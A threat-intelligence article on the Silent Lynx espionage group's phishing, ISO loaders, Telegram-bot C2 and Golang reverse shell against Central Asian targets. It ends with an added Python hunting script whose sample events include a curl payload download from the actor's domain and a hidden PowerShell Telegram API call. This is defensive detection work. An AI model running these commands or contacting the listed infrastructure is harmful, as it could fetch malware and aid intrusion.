A newly identified threat actor, Silent Lynx, has been linked to a series of sophisticated cyberattacks targeting organizations in Kyrgyzstan and Turkmenistan.
Silent Lynx: Targeting Central Asia’s Key Sectors
According to Seqrite Labs researcher Subhajeet Singha, this elusive group has previously attacked government think tanks in Eastern Europe and Central Asia, particularly those involved in economic policy-making and banking. Its latest activity has been attributed, with medium confidence, to a Kazakhstan-based threat actor.
Spear-Phishing and Multi-Stage Payloads
Silent Lynx employs spear-phishing emails to initiate their attacks, embedding malicious RAR archives that serve as delivery mechanisms for remote access malware. Their primary targets include embassies, government-backed banks, legal professionals, and research institutions.
The first campaign, detected on December 27, 2024, uses an ISO file within a RAR archive, deploying:
A malicious C++ binary
A decoy PDF document
A PowerShell script that communicates via Telegram bots (@south_korea145_bot and @south_afr_angl_bot) to execute commands and exfiltrate sensitive data.
Among the commands issued through the bots are curl invocations that download and save additional payloads, fetched either from a remote server (pweobmxdlboi[.]com) or from Google Drive.
Second Campaign: Golang-Based Reverse Shell
In another attack variant, Silent Lynx distributes a malicious RAR archive containing:
A decoy PDF file
A Golang-based executable designed to establish a reverse shell to an attacker-controlled server (185.122.171[.]22:8082).
Silent Lynx and YoroTrooper: Tactical Overlaps
Seqrite Labs observed tactical similarities between Silent Lynx and YoroTrooper (aka SturgeonPhisher), a group known for targeting Commonwealth of Independent States (CIS) nations using PowerShell and Golang tools.
A Stealthy and Persistent Espionage Operation
Silent Lynx’s campaigns highlight an advanced, multi-stage cyberattack methodology, leveraging:
ISO files as initial infection vectors
C++ loaders to execute malicious scripts
PowerShell scripts for system manipulation
Golang implants that open a reverse shell for remote access
The group’s dependence on Telegram bots for command-and-control (C2), combined with their use of decoy documents and targeted espionage, underscores their strategic focus on Central Asia and SPECA (Special Programme for the Economies of Central Asia) nations.
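As an added example (not from Seqrite Labs or the original write-up), the Python sketch below turns the indicators in this article into hunting logic over endpoint telemetry: an ISO dropped by archive extraction, curl spawned by PowerShell to the payload host, PowerShell calling the Telegram Bot API, and any connection to the Golang reverse-shell socket. The event schema (modelled loosely on Sysmon process, network and file events), the WinRAR temp-directory naming and every sample record are assumptions or constructed data; only the bot handles, the payload domain and the C2 address come from the article. Note that the Bot API URL carries the bot token, not its @handle, so the two bot names are indicators for reviewing recovered scripts, not for matching network traffic.

```python
"""Hunting logic for the Silent Lynx delivery and C2 chain described in the write-up.

Added example, not Seqrite's code. The event schema and the sample records are
constructed; only the indicators (bot handles, payload domain, C2 socket) come
from the article.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicators from the write-up, refanged for matching.
TELEGRAM_BOTS = {"south_korea145_bot", "south_afr_angl_bot"}  # for script/artifact review only
PAYLOAD_DOMAIN = "pweobmxdlboi.com"
GOLANG_C2 = ("185.122.171.22", 8082)

# Assumption: process names under which the PowerShell stage would run.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Bot API calls look like https://api.telegram.org/bot<token>/<method>
TELEGRAM_API_RE = re.compile(r"api\.telegram\.org/bot[^/\s\"']+/(\w+)", re.I)


@dataclass
class ProcessEvent:  # process creation (assumed schema, cf. Sysmon EID 1)
    host: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class NetworkEvent:  # outbound connection (assumed schema, cf. Sysmon EID 3)
    host: str
    image: str
    dest: str        # destination hostname or IP
    dest_port: int


@dataclass
class FileEvent:     # file creation (assumed schema, cf. Sysmon EID 11)
    host: str
    image: str
    path: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: ProcessEvent) -> list[str]:
    """Stage-2 download via curl and Telegram Bot API use from a script host."""
    hits: list[str] = []
    parent, image = _basename(ev.parent_image), _basename(ev.image)
    cl = ev.command_line.lower()
    if parent in SCRIPT_HOSTS and image == "curl.exe":
        hits.append("curl spawned by PowerShell")
        if PAYLOAD_DOMAIN in cl or "drive.google.com" in cl:
            hits.append("curl to known payload host")
    if image in SCRIPT_HOSTS or parent in SCRIPT_HOSTS:
        m = TELEGRAM_API_RE.search(cl)
        if m:
            hits.append(f"Telegram Bot API call ({m.group(1)}) from script host")
    return hits


def check_network(ev: NetworkEvent) -> list[str]:
    hits: list[str] = []
    if (ev.dest, ev.dest_port) == GOLANG_C2:
        hits.append("connection to Silent Lynx Golang reverse-shell C2")
    if _basename(ev.image) in SCRIPT_HOSTS and ev.dest.lower() == "api.telegram.org":
        hits.append("PowerShell talking to api.telegram.org")
    return hits


def check_file(ev: FileEvent) -> list[str]:
    # Assumption: WinRAR extracts a double-clicked member into %TEMP%\Rar$....
    path = ev.path.lower()
    if path.endswith(".iso") and "\\rar$" in path:
        return ["ISO dropped from RAR archive extraction"]
    return []


def hunt(events) -> list[tuple[str, str]]:
    """Return (host, finding) pairs for every event that matches the chain."""
    findings: list[tuple[str, str]] = []
    for ev in events:
        if isinstance(ev, ProcessEvent):
            hits = check_process(ev)
        elif isinstance(ev, NetworkEvent):
            hits = check_network(ev)
        elif isinstance(ev, FileEvent):
            hits = check_file(ev)
        else:
            hits = []
        findings.extend((ev.host, h) for h in hits)
    return findings


# Constructed telemetry: WS01 and WS02 replay the chain, WS03 is benign noise.
SAMPLE_EVENTS = [
    FileEvent("WS01", r"C:\Program Files\WinRAR\WinRAR.exe",
              r"C:\Users\a\AppData\Local\Temp\Rar$DIa1234.5678\Invoice.iso"),
    ProcessEvent("WS01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\curl.exe",
                 r"curl.exe -s -o %TEMP%\upd.exe https://pweobmxdlboi.com/upd.exe"),
    ProcessEvent("WS01", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -c "Invoke-RestMethod '
                 'https://api.telegram.org/bot0000000000:EXAMPLETOKEN/getUpdates"'),
    NetworkEvent("WS02", r"C:\Users\b\Downloads\report.exe", "185.122.171.22", 8082),
    NetworkEvent("WS03", r"C:\Program Files\Mozilla Firefox\firefox.exe", "api.telegram.org", 443),
    ProcessEvent("WS03", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for host, finding in hunt(SAMPLE_EVENTS):
        print(f"{host}: {finding}")
```

The Telegram check deliberately keys on the process (a script host) rather than the destination alone, since api.telegram.org from a browser or the desktop client is normal traffic; the IP:port match, by contrast, is a straight indicator and will age as the actor rotates infrastructure.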
Conclusion: A Growing Cyber Threat
Silent Lynx represents an emerging cyber espionage threat with a highly adaptable toolkit. Security professionals and organizations operating in Eastern Europe and Central Asia must bolster their email security defenses, implement advanced threat detection, and stay vigilant against multi-stage cyber threats.